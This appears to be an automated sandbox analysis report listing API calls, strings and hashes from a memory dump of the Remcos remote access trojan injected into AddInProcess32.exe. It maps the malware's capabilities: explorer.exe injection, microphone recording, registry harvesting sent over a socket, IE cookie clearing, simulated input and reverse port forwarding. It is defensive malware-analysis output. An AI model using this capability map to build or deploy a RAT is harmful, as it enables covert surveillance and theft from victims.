                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Eventinet_ntoa
                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                  • API String ID: 3578746661-3604713145
                  • Opcode ID: 4f065297b3db04d08fab799040971db11ee763eabe84935d17a6cb70e7b06ee3
                  • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                  • Opcode Fuzzy Hash: 4f065297b3db04d08fab799040971db11ee763eabe84935d17a6cb70e7b06ee3
                  • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                  APIs
                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: DecodePointer
                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                  • API String ID: 3527080286-3064271455
                  • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                  • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                  • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                  • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                  APIs
                  • GetConsoleCP.KERNEL32 ref: 0044B3FE
                  • __fassign.LIBCMT ref: 0044B479
                  • __fassign.LIBCMT ref: 0044B494
                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000), ref: 0044B4D9
                  • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000), ref: 0044B512
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                  • String ID: PkGNG
                  • API String ID: 1324828854-263838557
                  • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                  • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                  • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                  • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                  APIs
                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                    • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                  • Sleep.KERNEL32(00000064), ref: 00417521
                  • DeleteFileW.KERNEL32(00000000), ref: 00417555
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CreateDeleteExecuteShellSleep
                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                  • API String ID: 1462127192-2001430897
                  • Opcode ID: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
                  • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                  • Opcode Fuzzy Hash: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
                  • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                  APIs
                  • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                  • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe), ref: 0040749E
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentProcess
                  • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                  • API String ID: 2050909247-4242073005
                  • Opcode ID: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                  • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                  • Opcode Fuzzy Hash: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                  • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                  APIs
                  • _strftime.LIBCMT ref: 00401D50
                    • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                  • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                  • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                  • API String ID: 3809562944-243156785
                  • Opcode ID: 056d7ed0179ee1e3bc41876d6f94bfa6cd5a524795bf822a31929a0c00ad1597
                  • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                  • Opcode Fuzzy Hash: 056d7ed0179ee1e3bc41876d6f94bfa6cd5a524795bf822a31929a0c00ad1597
                  • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                  APIs
                  • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                  • int.LIBCPMT ref: 00410E81
                    • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                    • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                  • std::_Facet_Register.LIBCPMT ref: 00410EC1
                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                  • __Init_thread_footer.LIBCMT ref: 00410F29
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                  • String ID: ,kG$0kG
                  • API String ID: 3815856325-2015055088
                  • Opcode ID: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
                  • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                  • Opcode Fuzzy Hash: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
                  • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                  APIs
                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                  • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                  • waveInStart.WINMM ref: 00401CFE
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                  • String ID: dMG$|MG$PG
                  • API String ID: 1356121797-532278878
                  • Opcode ID: f0413ad6b7edbe83be065844dac3f0d77922414ea45c2d30098e63d2db50c4df
                  • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                  • Opcode Fuzzy Hash: f0413ad6b7edbe83be065844dac3f0d77922414ea45c2d30098e63d2db50c4df
                  • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                    • Part of subcall function 0041D50F: RegisterClassExA.USER32 ref: 0041D55B
                    • Part of subcall function 0041D50F: CreateWindowExA.USER32 ref: 0041D576
                    • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                  • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                  • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                  • TranslateMessage.USER32(?), ref: 0041D4E9
                  • DispatchMessageA.USER32 ref: 0041D4F3
                  • GetMessageA.USER32 ref: 0041D500
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                  • String ID: Remcos
                  • API String ID: 1970332568-165870891
                  • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                  • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                  • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                  • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
                  • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                  • Opcode Fuzzy Hash: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
                  • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                  APIs
                    • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                  • _memcmp.LIBVCRUNTIME ref: 00445423
                  • _free.LIBCMT ref: 00445494
                  • _free.LIBCMT ref: 004454AD
                  • _free.LIBCMT ref: 004454DF
                  • _free.LIBCMT ref: 004454E8
                  • _free.LIBCMT ref: 004454F4
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free$ErrorLast$_abort_memcmp
                  • String ID: C
                  • API String ID: 1679612858-1037565863
                  • Opcode ID: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                  • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                  • Opcode Fuzzy Hash: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                  • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: tcp$udp
                  • API String ID: 0-3725065008
                  • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                  • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                  • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                  • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                  APIs
                    • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                  • SetLastError.KERNEL32(000000C1,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                  • GetNativeSystemInfo.KERNEL32(?), ref: 00411DA5
                  • SetLastError.KERNEL32(0000000E), ref: 00411DC9
                    • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,00411DE7,?,00000000,00003000,00000040,00000000), ref: 00411CB3
                  • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00411E10
                  • HeapAlloc.KERNEL32(00000000), ref: 00411E17
                  • SetLastError.KERNEL32(0000045A), ref: 00411F2A
                    • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
                    • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                  • String ID: t^F
                  • API String ID: 3950776272-389975521
                  • Opcode ID: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
                  • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                  • Opcode Fuzzy Hash: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
                  • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                  APIs
                  • __Init_thread_footer.LIBCMT ref: 004018BE
                  • ExitThread.KERNEL32 ref: 004018F6
                  • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                    • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                  • String ID: PkG$XMG$NG$NG
                  • API String ID: 1649129571-3151166067
                  • Opcode ID: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
                  • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                  • Opcode Fuzzy Hash: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
                  • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                  APIs
                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 004079C5
                  • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A0D
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                  • CloseHandle.KERNEL32(00000000), ref: 00407A4D
                  • MoveFileW.KERNEL32 ref: 00407A6A
                  • CloseHandle.KERNEL32(00000000), ref: 00407A95
                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                    • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                    • Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                  • String ID: .part
                  • API String ID: 1303771098-3499674018
                  • Opcode ID: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
                  • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                  • Opcode Fuzzy Hash: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
                  • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                  APIs
                  • SendInput.USER32(00000001,?,0000001C), ref: 004199CC
                  • SendInput.USER32(00000001,?,0000001C), ref: 004199ED
                  • SendInput.USER32(00000001,?,0000001C), ref: 00419A0D
                  • SendInput.USER32(00000001,?,0000001C), ref: 00419A21
                  • SendInput.USER32(00000001,?,0000001C), ref: 00419A37
                  • SendInput.USER32(00000001,?,0000001C), ref: 00419A54
                  • SendInput.USER32(00000001,?,0000001C), ref: 00419A6F
                  • SendInput.USER32(00000001,?,0000001C), ref: 00419A8B
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: InputSend
                  • String ID:
                  • API String ID: 3431551938-0
                  • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                  • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                  • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                  • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: __freea$__alloca_probe_16_free
                  • String ID: a/p$am/pm$zD
                  • API String ID: 2936374016-2723203690
                  • Opcode ID: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                  • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                  • Opcode Fuzzy Hash: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                  • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                  APIs
                  • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                  • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413B8B
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Enum$InfoQueryValue
                  • String ID: [regsplt]$xUG$TG
                  • API String ID: 3554306468-1165877943
                  • Opcode ID: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                  • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                  • Opcode Fuzzy Hash: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                  • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free
                  • String ID: D[E$D[E
                  • API String ID: 269201875-3695742444
                  • Opcode ID: bc4a191701c62eeb9847f09c94d148ade9b95fc5d58c951cd89fb7ba37de2388
                  • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                  • Opcode Fuzzy Hash: bc4a191701c62eeb9847f09c94d148ade9b95fc5d58c951cd89fb7ba37de2388
                  • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                  APIs
                  • RegOpenKeyExW.ADVAPI32 ref: 00413D46
                    • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                    • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                  • RegCloseKey.ADVAPI32(00000000), ref: 00413EB4
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumInfoOpenQuerysend
                  • String ID: xUG$NG$NG$TG
                  • API String ID: 3114080316-2811732169
                  • Opcode ID: f2e89265f4d2f0cfb10cd8f2c72011435137814bee02f1038c413f2e8c362d66
                  • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                  • Opcode Fuzzy Hash: f2e89265f4d2f0cfb10cd8f2c72011435137814bee02f1038c413f2e8c362d66
                  • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F8C8,?,00000000,?,00000001,?,000000FF,00000001,0043F8C8,?), ref: 00451179
                  • __alloca_probe_16.LIBCMT ref: 004511B1
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451202
                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451214
                  • __freea.LIBCMT ref: 0045121D
                    • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                  • String ID: PkGNG
                  • API String ID: 313313983-263838557
                  • Opcode ID: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                  • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                  • Opcode Fuzzy Hash: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                  • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                  APIs
                    • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32 ref: 0041363D
                    • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                    • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                    • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                  • _wcslen.LIBCMT ref: 0041B763
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                  • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                  • API String ID: 37874593-122982132
                  • Opcode ID: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
                  • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                  • Opcode Fuzzy Hash: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
                  • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                  APIs
                    • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                    • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32 ref: 004135E7
                    • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                  • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                  • API String ID: 1133728706-4073444585
                  • Opcode ID: 246bfe7413cfec2d8385f2843d619168fbbecd56299b2e52a4c2fcf38f83732e
                  • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                  • Opcode Fuzzy Hash: 246bfe7413cfec2d8385f2843d619168fbbecd56299b2e52a4c2fcf38f83732e
